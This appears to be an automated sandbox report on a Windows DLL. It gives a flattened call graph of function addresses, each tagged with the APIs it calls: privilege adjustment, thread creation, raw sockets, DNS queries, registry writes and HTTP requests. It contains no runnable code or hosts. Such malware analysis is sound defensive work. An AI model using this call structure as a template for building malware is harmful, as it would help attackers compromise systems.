20736 6cd64fd4 20737 6cd64fe4 20736->20737 20738 6cd64fd8 20736->20738 20809 6cd66580 20737->20809 20741 6cd52080 3 API calls 20738->20741 20740 6cd65028 20739->20740 20743 6cd56f30 codecvt 4 API calls 20739->20743 20740->20458 20741->20739 20743->20740 20744 6cd6500d 20744->20739 20745 6cd52080 3 API calls 20744->20745 20745->20739 20814 6cd5f810 20746->20814 20748 6cd634f3 20749 6cd512ee 20748->20749 20750 6cd52080 3 API calls 20748->20750 20751 6cd71dd0 20749->20751 20750->20749 20752 6cd72b00 4 API calls 20751->20752 20753 6cd71e50 20752->20753 20754 6cd71e70 20753->20754 20755 6cd71e5e 20753->20755 20757 6cd72be0 4 API calls 20754->20757 20756 6cd72d80 3 API calls 20755->20756 20761 6cd71e63 20756->20761 20758 6cd71e8d 20757->20758 20759 6cd71ea3 20758->20759 20760 6cd71e91 20758->20760 20764 6cd72be0 4 API calls 20759->20764 20762 6cd72d80 3 API calls 20760->20762 20763 6cd512f9 20761->20763 20765 6cd72c50 4 API calls 20761->20765 20762->20761 20763->20474 20795 6cd70440 31 API calls 20763->20795 20766 6cd71ec5 20764->20766 20767 6cd71fd2 20765->20767 20768 6cd71edb 20766->20768 20769 6cd71ec9 20766->20769 21535 6cd72cb0 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 20767->21535 20772 6cd6d910 4 API calls 20768->20772 20771 6cd72d80 3 API calls 20769->20771 20771->20761 20773 6cd71ee2 20772->20773 20774 6cd71efd 20773->20774 20775 6cd71eeb 20773->20775 21525 6cd72b70 20774->21525 20777 6cd72d80 3 API calls 20775->20777 20777->20761 20778 6cd71f2b 20779 6cd71f2f 20778->20779 20780 6cd71f3e 20778->20780 20781 6cd72d80 3 API calls 20779->20781 21530 6cd72d10 20780->21530 20781->20761 20783 6cd71f78 20784 6cd71f7c 20783->20784 20785 6cd71f88 20783->20785 20786 6cd72d80 3 API calls 20784->20786 20787 6cd5f810 31 API calls 20785->20787 20786->20761 20788 6cd71f9e 20787->20788 20788->20763 20789 6cd72d80 3 API calls 20788->20789 20789->20761 20791 6cd5f810 31 API calls 20790->20791 20792 6cd6bc1e 20791->20792 20793 6cd6bc31 20792->20793 20794 6cd52080 3 API calls 20792->20794 20793->20474 20794->20793 20795->20466 20796->20474 20797->20474 20798->20474 20799->20471 20800->20475 20801->20480 20802->20476 20803->20482 20805 6cd6655a LookupPrivilegeValueW 20804->20805 20806 6cd6651f codecvt 20804->20806 20805->20736 20807 6cd531d0 codecvt 3 API calls 20806->20807 20808 6cd6654a codecvt 20807->20808 20808->20805 20810 6cd665ca AdjustTokenPrivileges 20809->20810 20811 6cd6658f codecvt 20809->20811 20810->20744 20812 6cd531d0 codecvt 3 API calls 20811->20812 20813 6cd665ba codecvt 20812->20813 20813->20810 20815 6cd5f85a CreateThread 20814->20815 20816 6cd5f81f codecvt 20814->20816 20815->20748 20819 6cd6c490 20815->20819 20837 6cd72080 20815->20837 20851 6cd74ed0 20815->20851 20817 6cd531d0 codecvt 3 API calls 20816->20817 20818 6cd5f84a codecvt 20817->20818 20818->20815 20820 6cd6c4b5 codecvt 20819->20820 20821 6cd51f20 3 API calls 20820->20821 20822 6cd6c4c7 codecvt 20821->20822 20823 6cd51ff0 3 API calls 20822->20823 20824 6cd6c4dc 20823->20824 20825 6cd52550 4 API calls 20824->20825 20831 6cd6c4e9 20825->20831 20832 6cd6c5d7 20831->20832 20859 6cd70be0 20831->20859 20862 6cd70dc0 20831->20862 20865 6cd6be60 20831->20865 20898 6cd6bfc0 20831->20898 20922 6cd5f880 20831->20922 20926 6cd70de0 20831->20926 20933 6cd70c10 20831->20933 20834 6cd6c62f 20832->20834 20835 6cd525e0 codecvt 4 API calls 20832->20835 20835->20834 20838 6cd7209f codecvt 20837->20838 20839 6cd51f20 3 API calls 20838->20839 20840 6cd720b1 codecvt 20839->20840 20841 6cd51ff0 3 API calls 20840->20841 20842 6cd720c3 20841->20842 20843 6cd536c0 4 API calls 20842->20843 20844 6cd720d9 20843->20844 20848 6cd72d80 3 API calls 20844->20848 20850 6cd72111 20844->20850 21331 6cd72de0 20844->21331 21336 6cd72140 LoadLibraryA LoadLibraryA LoadLibraryA RegCreateKeyExW codecvt 20844->21336 20845 6cd53730 codecvt 4 API calls 20847 6cd72137 20845->20847 20848->20844 20850->20845 20852 6cd74eef codecvt 20851->20852 20853 6cd51f20 3 API calls 20852->20853 20854 6cd74f01 codecvt 20853->20854 20855 6cd51ff0 3 API calls 20854->20855 20856 6cd74f13 20855->20856 21337 6cd73d70 20856->21337 20860 6cd70c10 8 API calls 20859->20860 20861 6cd70bfb 20860->20861 20861->20831 20863 6cd70de0 5 API calls 20862->20863 20864 6cd70dd6 20863->20864 20864->20831 20950 6cd75a30 20865->20950 20870 6cd6beb3 20958 6cd75bd0 20870->20958 20871 6cd6be9f 20873 6cd6bed2 20871->20873 20874 6cd6bea8 20871->20874 21011 6cd76190 10 API calls 20873->21011 20875 6cd6beb1 20874->20875 21012 6cd76480 10 API calls 20874->21012 20878 6cd6bf30 20875->20878 20879 6cd6bf01 20875->20879 20981 6cd76900 20878->20981 20881 6cd76bd0 3 API calls 20879->20881 20883 6cd6bf09 20881->20883 20886 6cd76bf0 4 API calls 20883->20886 20884 6cd6bf66 20986 6cd6c130 20884->20986 20885 6cd6bf58 20887 6cd6bf64 20885->20887 21013 6cd6c330 31 API calls codecvt 20885->21013 20889 6cd6bf11 20886->20889 20999 6cd76bd0 20887->20999 20891 6cd75b10 6 API calls 20889->20891 20893 6cd6bf25 20891->20893 20893->20831 21182 6cd73490 20898->21182 20908 6cd54860 3 API calls 20909 6cd6c032 20908->20909 20911 6cd54860 3 API calls 20909->20911 20913 6cd6c042 20911->20913 20915 6cd6d910 4 API calls 20913->20915 20916 6cd6c04c 20915->20916 20917 6cd6c0a4 20916->20917 20918 6cd6c096 20916->20918 20920 6cd6c130 31 API calls 20917->20920 20919 6cd6bffe 20918->20919 21236 6cd6c330 31 API calls codecvt 20918->21236 21206 6cd5f8e0 20919->21206 20920->20919 20923 6cd5f8ba codecvt 20922->20923 20924 6cd5f88f codecvt 20922->20924 20923->20831 20925 6cd531d0 codecvt 3 API calls 20924->20925 20925->20923 20927 6cd54860 3 API calls 20926->20927 20929 6cd70e04 20927->20929 20928 6cd70e24 20931 6cd70e63 20928->20931 21291 6cd70e90 LoadLibraryA LoadLibraryA LoadLibraryA 20928->21291 20929->20928 21274 6cd70ec0 20929->21274 20931->20831 20934 6cd70c29 codecvt 20933->20934 20936 6cd70cae 20934->20936 20939 6cd70cd0 20934->20939 20943 6cd70d71 20934->20943 21308 6cd56da0 20934->21308 21321 6cd71440 7 API calls 20934->21321 20938 6cd53810 3 API calls 20936->20938 20938->20939 21312 6cd71860 20939->21312 20941 6cd70d64 21324 6cd70d90 LoadLibraryA LoadLibraryA LoadLibraryA 20941->21324 20943->20831 20944 6cd70d06 20944->20941 20946 6cd70d50 20944->20946 21316 6cd71710 20944->21316 21322 6cd718c0 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 20946->21322 20948 6cd70d59 21323 6cd71800 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 20948->21323 21014 6cd72f10 20950->21014 20953 6cd75ba0 21045 6cd72b00 20953->21045 20955 6cd75bb2 20956 6cd6be80 20955->20956 20957 6cd72d80 3 API calls 20955->20957 20956->20870 20956->20871 20957->20956 21050 6cd6d910 20958->21050 20960 6cd75be9 20961 6cd75c04 20960->20961 20962 6cd75bf2 20960->20962 21055 6cd72e50 20961->21055 20963 6cd72d80 3 API calls 20962->20963 20968 6cd75bf7 20963->20968 20965 6cd75c24 21059 6cd76d90 20965->21059 20967 6cd75c3a 20969 6cd75c50 20967->20969 20970 6cd75c3e 20967->20970 20979 6cd75d06 20968->20979 21074 6cd72c50 20968->21074 21064 6cd72be0 20969->21064 20971 6cd72d80 3 API calls 20970->20971 20971->20968 20974 6cd75c70 21069 6cd76e00 20974->21069 20975 6cd75cfa 21079 6cd72cb0 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 20975->21079 20978 6cd75caf 20978->20968 20980 6cd72be0 4 API calls 20978->20980 20979->20875 20980->20968 21080 6cd76e80 20981->21080 20983 6cd76932 20985 6cd6bf40 20983->20985 21085 6cd76ef0 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 20983->21085 20985->20884 20985->20885 21086 6cd65f80 20986->21086 20988 6cd6c1c1 21089 6cd73360 20988->21089 20989 6cd65f80 3 API calls 20991 6cd6c157 20989->20991 20991->20988 20991->20989 20993 6cd6c1d2 20994 6cd6c1db 20993->20994 21096 6cd73250 20993->21096 21104 6cd6cb10 13 API calls codecvt 20993->21104 21105 6cd6d1e0 31 API calls codecvt 20993->21105 21106 6cd6d290 LoadLibraryA LoadLibraryA LoadLibraryA WSASend 20993->21106 21107 6cd6d2f0 6 API calls codecvt 20993->21107 20994->20887 21154 6cd770d0 20999->21154 21001 6cd6bf98 21002 6cd76bf0 21001->21002 21003 6cd76c00 21002->21003 21007 6cd6bfa0 21002->21007 21004 6cd72c50 4 API calls 21003->21004 21005 6cd76c0e 21004->21005 21158 6cd72cb0 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21005->21158 21008 6cd75b10 21007->21008 21159 6cd73060 21008->21159 21011->20875 21012->20875 21013->20887 21023 6cd6db80 21014->21023 21018 6cd72fa8 21019 6cd60a90 3 API calls 21018->21019 21020 6cd7300b 21019->21020 21021 6cd60a90 3 API calls 21020->21021 21022 6cd6be78 21021->21022 21022->20953 21036 6cd6e140 21023->21036 21025 6cd6dbb7 21026 6cd52550 4 API calls 21025->21026 21027 6cd6dbcf 21026->21027 21028 6cd52550 4 API calls 21027->21028 21029 6cd6dbf7 21028->21029 21040 6cd536c0 21029->21040 21031 6cd6dc22 21032 6cd60a90 21031->21032 21033 6cd60aca codecvt 21032->21033 21034 6cd60a9f codecvt 21032->21034 21033->21018 21035 6cd531d0 codecvt 3 API calls 21034->21035 21035->21033 21037 6cd6e17a codecvt 21036->21037 21038 6cd6e14f codecvt 21036->21038 21037->21025 21039 6cd531d0 codecvt 3 API calls 21038->21039 21039->21037 21041 6cd5370a VirtualAlloc 21040->21041 21042 6cd536cf codecvt 21040->21042 21041->21031 21043 6cd531d0 codecvt 3 API calls 21042->21043 21044 6cd536fa codecvt 21043->21044 21044->21041 21046 6cd72b4a socket 21045->21046 21047 6cd72b0f codecvt 21045->21047 21046->20955 21048 6cd531d0 codecvt 3 API calls 21047->21048 21049 6cd72b3a codecvt 21048->21049 21049->21046 21051 6cd6d95a gethostbyname 21050->21051 21052 6cd6d91f codecvt 21050->21052 21051->20960 21053 6cd531d0 codecvt 3 API calls 21052->21053 21054 6cd6d94a codecvt 21053->21054 21054->21051 21056 6cd72e5f codecvt 21055->21056 21057 6cd72e8a codecvt 21055->21057 21058 6cd531d0 codecvt 3 API calls 21056->21058 21057->20965 21058->21057 21060 6cd76dda connect 21059->21060 21061 6cd76d9f codecvt 21059->21061 21060->20967 21062 6cd531d0 codecvt 3 API calls 21061->21062 21063 6cd76dca codecvt 21062->21063 21063->21060 21065 6cd72c2a setsockopt 21064->21065 21066 6cd72bef codecvt 21064->21066 21065->20974 21067 6cd531d0 codecvt 3 API calls 21066->21067 21068 6cd72c1a codecvt 21067->21068 21068->21065 21070 6cd76e4a WSAIoctl 21069->21070 21071 6cd76e0f codecvt 21069->21071 21070->20978 21072 6cd531d0 codecvt 3 API calls 21071->21072 21073 6cd76e3a codecvt 21072->21073 21073->21070 21075 6cd72c9a shutdown 21074->21075 21076 6cd72c5f codecvt 21074->21076 21075->20975 21077 6cd531d0 codecvt 3 API calls 21076->21077 21078 6cd72c8a codecvt 21077->21078 21078->21075 21079->20979 21081 6cd76e8f codecvt 21080->21081 21082 6cd76eca getsockname 21080->21082 21083 6cd531d0 codecvt 3 API calls 21081->21083 21082->20983 21084 6cd76eba codecvt 21083->21084 21084->21082 21085->20985 21108 6cd663e0 21086->21108 21088 6cd65f8f 21088->20991 21112 6cd6dcf0 21089->21112 21091 6cd7338a 21091->20993 21092 6cd73381 21092->21091 21093 6cd7340b 21092->21093 21123 6cd73190 21092->21123 21128 6cd53810 21093->21128 21097 6cd73270 21096->21097 21099 6cd732b2 21097->21099 21103 6cd7329f 21097->21103 21141 6cd730e0 21097->21141 21100 6cd73333 21099->21100 21102 6cd730e0 4 API calls 21099->21102 21099->21103 21146 6cd6de70 LoadLibraryA LoadLibraryA LoadLibraryA 21100->21146 21102->21099 21103->20993 21104->20993 21105->20993 21106->20993 21107->20993 21109 6cd663ef codecvt 21108->21109 21110 6cd6641a codecvt 21108->21110 21111 6cd531d0 codecvt 3 API calls 21109->21111 21110->21088 21111->21110 21113 6cd6dd13 21112->21113 21121 6cd6dd09 21112->21121 21114 6cd65f80 3 API calls 21113->21114 21115 6cd6dd1a 21114->21115 21116 6cd6ddd6 21115->21116 21115->21121 21132 6cd6e210 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21115->21132 21118 6cd53810 3 API calls 21116->21118 21116->21121 21118->21121 21119 6cd6ddb9 21119->21116 21120 6cd6ddc2 21119->21120 21133 6cd6e1b0 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21120->21133 21121->21092 21134 6cd73430 21123->21134 21127 6cd731bf 21127->21092 21129 6cd5384a codecvt 21128->21129 21130 6cd5381f codecvt 21128->21130 21129->21091 21131 6cd531d0 codecvt 3 API calls 21130->21131 21131->21129 21132->21119 21133->21121 21138 6cd76c40 21134->21138 21137 6cd520e0 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21137->21127 21139 6cd76970 LoadLibraryA LoadLibraryA LoadLibraryA WSASend 21138->21139 21140 6cd731b6 21139->21140 21140->21127 21140->21137 21147 6cd595e0 21141->21147 21145 6cd73106 21145->21097 21146->21103 21151 6cd76c80 21147->21151 21150 6cd520e0 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21150->21145 21152 6cd769e0 LoadLibraryA LoadLibraryA LoadLibraryA WSARecv 21151->21152 21153 6cd59613 21152->21153 21153->21145 21153->21150 21155 6cd7710a codecvt 21154->21155 21156 6cd770df codecvt 21154->21156 21155->21001 21157 6cd531d0 codecvt 3 API calls 21156->21157 21157->21155 21158->21007 21160 6cd73076 21159->21160 21161 6cd73082 21159->21161 21163 6cd56f30 codecvt 4 API calls 21160->21163 21162 6cd730a1 21161->21162 21164 6cd56f30 codecvt 4 API calls 21161->21164 21165 6cd730c0 21162->21165 21166 6cd56f30 codecvt 4 API calls 21162->21166 21163->21161 21164->21162 21169 6cd6dc60 21165->21169 21166->21165 21170 6cd6dc8d 21169->21170 21171 6cd6dc7b 21169->21171 21173 6cd6dcc3 21170->21173 21174 6cd525e0 codecvt 4 API calls 21170->21174 21172 6cd525e0 codecvt 4 API calls 21171->21172 21172->21170 21177 6cd53730 21173->21177 21174->21173 21176 6cd6dce2 21176->20893 21178 6cd5377a VirtualFree 21177->21178 21179 6cd5373f codecvt 21177->21179 21178->21176 21180 6cd531d0 codecvt 3 API calls 21179->21180 21181 6cd5376a codecvt 21180->21181 21181->21178 21183 6cd72f10 5 API calls 21182->21183 21184 6cd7349f 21183->21184 21237 6cd54c30 21184->21237 21187 6cd53db0 5 API calls 21188 6cd734b8 21187->21188 21189 6cd53db0 5 API calls 21188->21189 21190 6cd734c6 21189->21190 21191 6cd53ff0 5 API calls 21190->21191 21192 6cd735a9 21191->21192 21193 6cd53ff0 5 API calls 21192->21193 21194 6cd6bfe0 21193->21194 21195 6cd73660 21194->21195 21196 6cd53810 3 API calls 21195->21196 21197 6cd7367e 21196->21197 21198 6cd5f810 31 API calls 21197->21198 21199 6cd736b3 21198->21199 21200 6cd6bfef 21199->21200 21201 6cd52080 3 API calls 21199->21201 21200->20919 21202 6cd736e0 21200->21202 21201->21200 21204 6cd736f2 21202->21204 21203 6cd6c00e 21203->20908 21203->20919 21204->21203 21205 6cd52210 4 API calls 21204->21205 21205->21204 21207 6cd51f80 3 API calls 21206->21207 21208 6cd5f8f3 21207->21208 21209 6cd5f8fc 21208->21209 21210 6cd52080 3 API calls 21208->21210 21211 6cd73730 21209->21211 21210->21209 21212 6cd73739 21211->21212 21213 6cd73751 21212->21213 21215 6cd52210 4 API calls 21212->21215 21244 6cd70070 21213->21244 21215->21212 21218 6cd737d5 21250 6cd73a50 21218->21250 21220 6cd52210 4 API calls 21222 6cd737c0 21220->21222 21222->21218 21222->21220 21223 6cd5f880 3 API calls 21224 6cd737f0 21223->21224 21225 6cd6c0ed 21224->21225 21226 6cd56f30 codecvt 4 API calls 21224->21226 21227 6cd73620 21225->21227 21226->21225 21228 6cd53fb0 4 API calls 21227->21228 21229 6cd73635 21228->21229 21230 6cd53fb0 4 API calls 21229->21230 21231 6cd73643 21230->21231 21267 6cd54c70 21231->21267 21234 6cd73060 codecvt 6 API calls 21235 6cd6c102 21234->21235 21235->20831 21236->20919 21240 6cd54cb0 21237->21240 21239 6cd54c4a 21239->21187 21241 6cd54cbf codecvt 21240->21241 21243 6cd54cea codecvt 21240->21243 21242 6cd531d0 codecvt 3 API calls 21241->21242 21242->21243 21243->21239 21259 6cd70090 21244->21259 21246 6cd70080 21247 6cd70110 21246->21247 21263 6cd70130 21247->21263 21249 6cd70120 21249->21222 21251 6cd70070 3 API calls 21250->21251 21252 6cd73a68 21251->21252 21254 6cd51f80 3 API calls 21252->21254 21255 6cd73ad9 21252->21255 21253 6cd73b40 21257 6cd70110 3 API calls 21253->21257 21254->21255 21255->21253 21256 6cd51f80 3 API calls 21255->21256 21256->21253 21258 6cd737e2 21257->21258 21258->21223 21260 6cd700ca codecvt 21259->21260 21261 6cd7009f codecvt 21259->21261 21260->21246 21262 6cd531d0 codecvt 3 API calls 21261->21262 21262->21260 21264 6cd7016a codecvt 21263->21264 21265 6cd7013f codecvt 21263->21265 21264->21249 21266 6cd531d0 codecvt 3 API calls 21265->21266 21266->21264 21270 6cd54d10 21267->21270 21269 6cd54c94 21269->21234 21271 6cd54d1f codecvt 21270->21271 21273 6cd54d4a codecvt 21270->21273 21272 6cd531d0 codecvt 3 API calls 21271->21272 21272->21273 21273->21269 21275 6cd70f05 codecvt 21274->21275 21292 6cd5d870 21275->21292 21278 6cd70fa5 21282 6cd70f31 21278->21282 21302 6cd5d960 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21278->21302 21281 6cd70f17 codecvt 21281->21278 21281->21282 21283 6cd70fff 21281->21283 21297 6cd71990 21281->21297 21303 6cd71350 LoadLibraryA LoadLibraryA LoadLibraryA 21281->21303 21282->20928 21285 6cd7101b 21283->21285 21304 6cd5d960 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21283->21304 21305 6cd71920 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21285->21305 21287 6cd71095 21306 6cd71920 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21287->21306 21289 6cd710aa 21307 6cd71920 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21289->21307 21291->20931 21293 6cd5d8ba RegCreateKeyExW 21292->21293 21294 6cd5d87f codecvt 21292->21294 21293->21281 21295 6cd531d0 codecvt 3 API calls 21294->21295 21296 6cd5d8aa codecvt 21295->21296 21296->21293 21298 6cd719da RegEnumValueA 21297->21298 21299 6cd7199f codecvt 21297->21299 21298->21281 21300 6cd531d0 codecvt 3 API calls 21299->21300 21301 6cd719ca codecvt 21300->21301 21301->21298 21302->21282 21303->21281 21304->21285 21305->21287 21306->21289 21307->21282 21309 6cd56daf codecvt 21308->21309 21311 6cd56dda codecvt 21308->21311 21310 6cd531d0 codecvt 3 API calls 21309->21310 21310->21311 21311->20934 21313 6cd7186f codecvt 21312->21313 21314 6cd7189a codecvt 21312->21314 21315 6cd531d0 codecvt 3 API calls 21313->21315 21314->20944 21315->21314 21325 6cd71ca0 21316->21325 21318 6cd71743 21319 6cd7174c 21318->21319 21330 6cd71d10 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21318->21330 21319->20944 21321->20934 21322->20948 21323->20941 21324->20943 21326 6cd71cea DnsQuery_A 21325->21326 21327 6cd71caf codecvt 21325->21327 21326->21318 21328 6cd531d0 codecvt 3 API calls 21327->21328 21329 6cd71cda codecvt 21328->21329 21329->21326 21330->21319 21332 6cd72def codecvt 21331->21332 21333 6cd72e2a recv 21331->21333 21334 6cd531d0 codecvt 3 API calls 21332->21334 21333->20844 21335 6cd72e1a codecvt 21334->21335 21335->21333 21336->20844 21367 6cd6ef20 21337->21367 21339 6cd73d87 21371 6cd74f90 21339->21371 21341 6cd73d8d 21342 6cd68fb0 7 API calls 21341->21342 21343 6cd73db7 21342->21343 21344 6cd73dc0 21343->21344 21398 6cd6f3e0 LoadLibraryA LoadLibraryA LoadLibraryA 21343->21398 21346 6cd73dfd 21344->21346 21399 6cd5bff0 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21344->21399 21348 6cd73e18 21346->21348 21350 6cd664a0 3 API calls 21346->21350 21349 6cd73e27 21348->21349 21400 6cd74ff0 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21348->21400 21376 6cd53e50 21349->21376 21350->21348 21354 6cd73e7c 21356 6cd73ed7 21354->21356 21401 6cd75050 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21354->21401 21355 6cd73e34 21355->21354 21357 6cd52210 4 API calls 21355->21357 21380 6cd73f30 21355->21380 21359 6cd73ee6 21356->21359 21360 6cd56f30 codecvt 4 API calls 21356->21360 21357->21355 21361 6cd73efc 21359->21361 21362 6cd56f30 codecvt 4 API calls 21359->21362 21360->21359 21363 6cd73a50 3 API calls 21361->21363 21362->21361 21364 6cd73f10 21363->21364 21365 6cd53fb0 4 API calls 21364->21365 21366 6cd73f1e 21365->21366 21368 6cd6ef5a codecvt 21367->21368 21369 6cd6ef2f codecvt 21367->21369 21368->21339 21370 6cd531d0 codecvt 3 API calls 21369->21370 21370->21368 21372 6cd74fda SetThreadPriority 21371->21372 21373 6cd74f9f codecvt 21371->21373 21372->21341 21374 6cd531d0 codecvt 3 API calls 21373->21374 21375 6cd74fca codecvt 21374->21375 21375->21372 21377 6cd53e6d 21376->21377 21378 6cd53ff0 5 API calls 21377->21378 21379 6cd53ec2 21378->21379 21379->21355 21381 6cd73f96 codecvt 21380->21381 21402 6cd71af0 21381->21402 21383 6cd74075 codecvt 21384 6cd74094 21383->21384 21385 6cd7409e 21383->21385 21386 6cd52080 3 API calls 21384->21386 21407 6cd750b0 21385->21407 21388 6cd74099 21386->21388 21392 6cd74116 21388->21392 21494 6cd71c40 21388->21494 21389 6cd740c0 21390 6cd740d3 21389->21390 21391 6cd740c9 21389->21391 21390->21388 21412 6cd74130 21390->21412 21393 6cd52080 3 API calls 21391->21393 21395 6cd74125 21392->21395 21397 6cd71c40 4 API calls 21392->21397 21393->21388 21395->21355 21397->21395 21398->21344 21399->21346 21400->21349 21401->21356 21403 6cd71b3a InternetOpenA 21402->21403 21404 6cd71aff codecvt 21402->21404 21403->21383 21405 6cd531d0 codecvt 3 API calls 21404->21405 21406 6cd71b2a codecvt 21405->21406 21406->21403 21408 6cd750fa InternetConnectA 21407->21408 21409 6cd750bf codecvt 21407->21409 21408->21389 21410 6cd531d0 codecvt 3 API calls 21409->21410 21411 6cd750ea codecvt 21410->21411 21411->21408 21413 6cd65f80 3 API calls 21412->21413 21414 6cd74162 codecvt 21413->21414 21499 6cd751a0 21414->21499 21416 6cd741e2 codecvt 21417 6cd74217 21416->21417 21418 6cd7420a 21416->21418 21504 6cd75300 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21417->21504 21419 6cd52080 3 API calls 21418->21419 21445 6cd7420f 21419->21445 21421 6cd7422f 21505 6cd75300 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21421->21505 21423 6cd74240 21506 6cd75300 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21423->21506 21424 6cd74d86 21424->21390 21426 6cd71c40 4 API calls 21426->21424 21427 6cd74251 codecvt 21507 6cd6eac0 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21427->21507 21429 6cd742d5 codecvt 21508 6cd6eac0 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21429->21508 21431 6cd74357 codecvt 21509 6cd6eac0 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21431->21509 21433 6cd743ee codecvt 21510 6cd6eac0 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21433->21510 21435 6cd54860 3 API calls 21449 6cd7447c codecvt 21435->21449 21437 6cd7455a 21438 6cd52080 3 API calls 21437->21438 21438->21445 21441 6cd74592 21443 6cd52080 3 API calls 21441->21443 21442 6cd52080 3 API calls 21442->21449 21443->21445 21445->21424 21445->21426 21446 6cd74651 codecvt 21515 6cd74d90 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21446->21515 21448 6cd54930 LoadLibraryA LoadLibraryA LoadLibraryA 21448->21449 21449->21435 21449->21437 21449->21441 21449->21442 21449->21445 21449->21446 21449->21448 21450 6cd75300 LoadLibraryA LoadLibraryA LoadLibraryA 21449->21450 21511 6cd75220 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21449->21511 21512 6cd75130 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21449->21512 21513 6cd75290 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21449->21513 21514 6cd74d90 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21449->21514 21450->21449 21451 6cd7472f codecvt 21451->21445 21516 6cd74d90 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21451->21516 21453 6cd74790 codecvt 21453->21445 21517 6cd74d90 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21453->21517 21455 6cd747f1 codecvt 21455->21445 21518 6cd74d90 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21455->21518 21457 6cd74852 codecvt 21457->21445 21519 6cd74d90 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21457->21519 21459 6cd748b3 codecvt 21459->21445 21460 6cd7493f 21459->21460 21461 6cd748de 21459->21461 21462 6cd749a6 21460->21462 21463 6cd74a4b 21460->21463 21464 6cd70070 3 API calls 21461->21464 21465 6cd70070 3 API calls 21462->21465 21467 6cd74a55 21463->21467 21468 6cd74b99 21463->21468 21466 6cd748ec 21464->21466 21469 6cd749b4 21465->21469 21470 6cd70110 3 API calls 21466->21470 21467->21445 21473 6cd70070 3 API calls 21467->21473 21472 6cd70070 3 API calls 21468->21472 21492 6cd74a30 21468->21492 21478 6cd70110 3 API calls 21469->21478 21471 6cd7492a 21470->21471 21475 6cd73a50 3 API calls 21471->21475 21476 6cd74bad 21472->21476 21477 6cd74a95 21473->21477 21475->21445 21479 6cd70110 3 API calls 21476->21479 21520 6cd54090 LoadLibraryA LoadLibraryA LoadLibraryA 21477->21520 21478->21492 21479->21492 21481 6cd74c24 21483 6cd52080 3 API calls 21481->21483 21482 6cd74b4e 21486 6cd70110 3 API calls 21482->21486 21483->21445 21484 6cd74c3a 21484->21445 21490 6cd52210 4 API calls 21484->21490 21485 6cd70070 3 API calls 21485->21492 21488 6cd74b8c 21486->21488 21521 6cd73b60 LoadLibraryA LoadLibraryA LoadLibraryA 21488->21521 21490->21484 21491 6cd70110 3 API calls 21491->21492 21492->21481 21492->21484 21492->21485 21492->21491 21522 6cd71bd0 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21492->21522 21523 6cd54090 LoadLibraryA LoadLibraryA LoadLibraryA 21492->21523 21524 6cd73c50 LoadLibraryA LoadLibraryA LoadLibraryA 21492->21524 21495 6cd71c8a InternetCloseHandle 21494->21495 21496 6cd71c4f codecvt 21494->21496 21495->21392 21497 6cd531d0 codecvt 3 API calls 21496->21497 21498 6cd71c7a codecvt 21497->21498 21498->21495 21500 6cd751ea HttpOpenRequestA 21499->21500 21501 6cd751af codecvt 21499->21501 21500->21416 21502 6cd531d0 codecvt 3 API calls 21501->21502 21503 6cd751da codecvt 21502->21503 21503->21500 21504->21421 21505->21423 21506->21427 21507->21429 21508->21431 21509->21433 21510->21449 21511->21449 21512->21449 21513->21449 21514->21449 21515->21451 21516->21453 21517->21455 21518->21457 21519->21459 21520->21482 21521->21492 21522->21492 21523->21492 21524->21492 21526 6cd72bba bind 21525->21526 21527 6cd72b7f codecvt 21525->21527 21526->20778 21528 6cd531d0 codecvt 3 API calls 21527->21528 21529 6cd72baa codecvt 21528->21529 21529->21526 21531 6cd72d5a ioctlsocket 21530->21531 21532 6cd72d1f codecvt 21530->21532 21531->20783 21533 6cd531d0 codecvt 3 API calls 21532->21533 21534 6cd72d4a codecvt 21533->21534 21534->21531 21535->20763 20366 6cd736f2 Sleep LoadLibraryA LoadLibraryA LoadLibraryA 20367 6cd74513 LoadLibraryA LoadLibraryA LoadLibraryA InternetCloseHandle 21985 6cd64f00 LoadLibraryA LoadLibraryA LoadLibraryA FindCloseChangeNotification codecvt 21806 6cd7450c 5 API calls codecvt 21987 6cd5ad09 7 API calls codecvt 21989 6cd75d30 12 API calls codecvt 21991 6cd77130 RtlAllocateHeap LoadLibraryA LoadLibraryA LoadLibraryA VirtualAlloc 21999 6cd5632e 5 API calls codecvt

                              Executed Functions

                              Function 6CD51000 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
